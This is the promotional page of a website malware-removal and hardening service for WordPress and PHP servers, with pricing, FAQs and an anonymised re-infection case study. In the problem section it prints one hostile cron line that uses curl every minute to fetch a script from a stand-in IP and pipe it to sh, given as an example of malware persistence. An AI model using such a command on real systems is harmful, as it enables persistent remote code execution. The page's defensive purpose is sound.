It spreads
One infected plugin gives attackers a foothold on your website, and on every other site, database and mailbox that shares your hosting.
▲ /home/shop/public_html/wp-content/uploads/.cache.php
Threat detection · Malware removal · Hardening
Malware on your business website? PatientZero finds the first point of infection, removes every trace of it and hardens your site so it can’t come back. One website or a whole server.
Platforms we protect
Supported platforms and stacks: WordPress, WooCommerce, PHP, Linux, AWS Lightsail, cPanel, CloudPanel, Plesk, GoDaddy, SiteGround, DigitalOcean, Drupal, Joomla.
For business owners
You don’t need a server, an IT team or any technical knowledge. If your website has been hacked, or you’re worried it might be, we fix it properly and look after it for you.
Sound familiar?
The problem
Whether you run one business website or a server full of client sites, you’re a target. Automated, AI-assisted tools scan millions of sites a day for an outdated plugin, a nulled theme or a stolen password. Once in, attackers can reach every other site on the same hosting account.
One infected plugin gives attackers a foothold on your website, and on every other site, database and mailbox that shares your hosting.
▲ /home/shop/public_html/wp-content/uploads/.cache.php
Modern malware hides in cron jobs, fake system binaries and database rows, re-infecting the site minutes after a plugin says it’s clean.
*/1 * * * * curl -s hxxp://203.0.113.24/x | sh
Lost enquiries and sales, Google warnings, lost search rankings, suspended hosting, stolen card data and ICO breach reports. The bill grows every hour it runs.
▲ Google Safe Browsing: "This site may be hacked"
The solution
For one business website or a whole server: a continuous loop that finds infections early, removes them completely and closes the door behind them. Detect. Clean. Protect. Repeat.
We watch your website and server around the clock: scheduled forensic scans, file-change tracking and uptime alerts.
Our own scan engine hunts for webshells, injected code, rogue admins, cron persistence and backdoors that plugins miss.
Humans verify every finding, remove the malware, keep the evidence and restore anything damaged. As often as it takes.
We close the way in: PHP execution blocked in uploads, SSH and firewall locked down, admins audited, re-infection prevented.
What’s included
Not a scan-and-hope plugin. A full incident response service, with the evidence to prove it.
Optional add-ons
For agencies
One compromised client site shouldn’t become twenty. We monitor and protect every site on your servers, keep them updated and send reports your clients can read, under your brand.
Built in-house
Designed from real incident response. PatientZero connects to your server over SSH, deploys its scan engine and runs forensic scans and malware sweeps across every site, then hardens what it finds.
Overview
Every server, connection and running scan, with a “needs attention” queue and one-click Harden and Fix.
Harden
Shipped playbooks close the doors attackers use most.
Forensic scan · dfir-fast
Reconstructs the attack timeline: the first way in, every persistence mechanism, every rogue account.
Malware sweep · malware-intelligence
Signatures and heuristics for webshells, injected JS, SEO spam, redirects, skimmers and miners.
Scans
Forensic and malware jobs across your servers, with findings you can open, fix and report on.
Reports
For clients, insurers and the ICO.
Live threat feed
Illustrative detections from the kind of infections we clean: webshells, cron persistence, rogue admins, reverse shells and SEO spam. Found, quarantined, hardened.
Example detections include a critical webshell in the uploads folder, a crontab entry re-downloading malware every minute, a rogue WordPress admin, a reverse shell listener and SEO spam doorway pages, each followed by quarantine, removal and hardening.
Use cases
No IT team needed. We clean any malware on your website, clear Google warnings, deal with your hosting company and watch your site 24/7, all for one monthly price per website with every clean-up included.
We contain the attack, find the first point of infection, remove every trace of malware from files, database and server, then verify the site is clean and back online. Every clean-up is documented.
Your sites are watched around the clock by our own scan engine. If anything gets in, we remove it at no extra cost and close the way in, as many times as it takes.
White-label, whole-server protection for the servers your client sites share. Updates across client sites, shareable reports and priority response when a client gets hit.
Find infected accounts before they get your IPs blacklisted. Our scan engine sweeps every site on the server and pinpoints which tenant is patient zero.
Card skimmers hide in checkout pages and plugins. We detect and remove checkout malware, monitor payment pages for changes and give you the evidence you need for UK GDPR and PCI.
Case study
An anonymised incident: a Linux server hosting dozens of WordPress sites kept re-infecting minutes after every clean-up.
A plugin said the sites were clean. They weren’t. Our forensic scan found a crontab entry re-downloading the payload every minute, a gsocket reverse shell, a rogue Tailscale VPN node giving the attacker a private way back in, and ALFA and KINGSMAN webshell kits spread across upload folders.
We removed every persistence mechanism, quarantined the shells with hashed evidence, rebuilt damaged WordPress core, rotated credentials and hardened the server. Then we kept watching.
Read the case studyGet protected
A quick security triage. Emergencies go straight to our incident team; everything else gets a tailored protection plan and quote.
Pricing
No per-incident fees, no contract. Cancel any time.
One website, fully protected and cleaned whenever it needs it.
£99/month
+ one-off £129.99 security audit and setup
Get protectedMost popular
Your whole VPS or shared server, every site on it included.
POA
Scoped to your server
Scope my serverWhole-server protection for your client sites, under your brand.
From£299/month
White-label for your clients
Talk to usEvery plan includes unlimited malware removal and no long-term contract. New accounts start with a one-off £129.99 security audit so we know exactly what we’re cleaning before the first removal.
If any site on your plan gets infected, we clean it, as many times as it takes, at no extra cost. There are no per-incident fees and no clean-up caps. Fair use applies only to full server rebuilds.
Call 01932 593642 or use the Under attack? button for an immediate callback. Don't delete files yet, change your hosting and admin passwords from a clean device, and take a backup snapshot so we can trace how the attacker got in.
Yes. PatientZero protects single business websites as well as whole servers. The Single Site plan is £99 a month plus a one-off £129.99 security audit and setup, and includes malware removal whenever it is needed, 24/7 monitoring and help with your hosting company. No technical knowledge needed.
Both. The Single Site plan covers one website. The Server / Multi-site plan covers your whole VPS or shared server with every site on it, which matters because one infected site can reach every other site on the same server.
Single Site is £99 a month plus a one-off £129.99 security audit and setup. Server / Multi-site is priced on application after we scope your server. White-label Agency plans start from £299 a month. There is no long-term contract.
We find and close the way in, not just the symptoms: webshells, cron jobs, rogue admins and backdoors are removed, then we harden the server by blocking PHP in uploads, locking down SSH and the firewall, auditing admins and monitoring 24/7.
WordPress and WooCommerce first, plus other PHP sites such as Joomla, Drupal and custom PHP. We work on Linux VPS and shared servers including AWS Lightsail, cPanel, CloudPanel, Plesk, GoDaddy and SiteGround.
No. Every plan is monthly with no long-term contract, and you can cancel any time. New accounts start with the one-off security audit so we know exactly what we are protecting.
Yes. The Agency plan is fully white-label: whole-server monitoring for your client sites, updates across client sites, shareable client reports under your brand and priority emergency response.
Resources
A webshell is a small script that gives an attacker a remote control panel on your server. Here is how they hide, how to find them and how to remove them without leaving a way back in.
What white-label website security means for a web agency, how the service fits around your client relationships, and what to check before you resell security under your own brand.
If malware returns hours or days after a clean-up, something on the server is putting it back. This guide explains the persistence mechanisms behind re-infection, using a real (anonymised) incident.
Get protected with unlimited malware removal, 24/7 monitoring and hardening, or get emergency help right now.
or call 01932 593642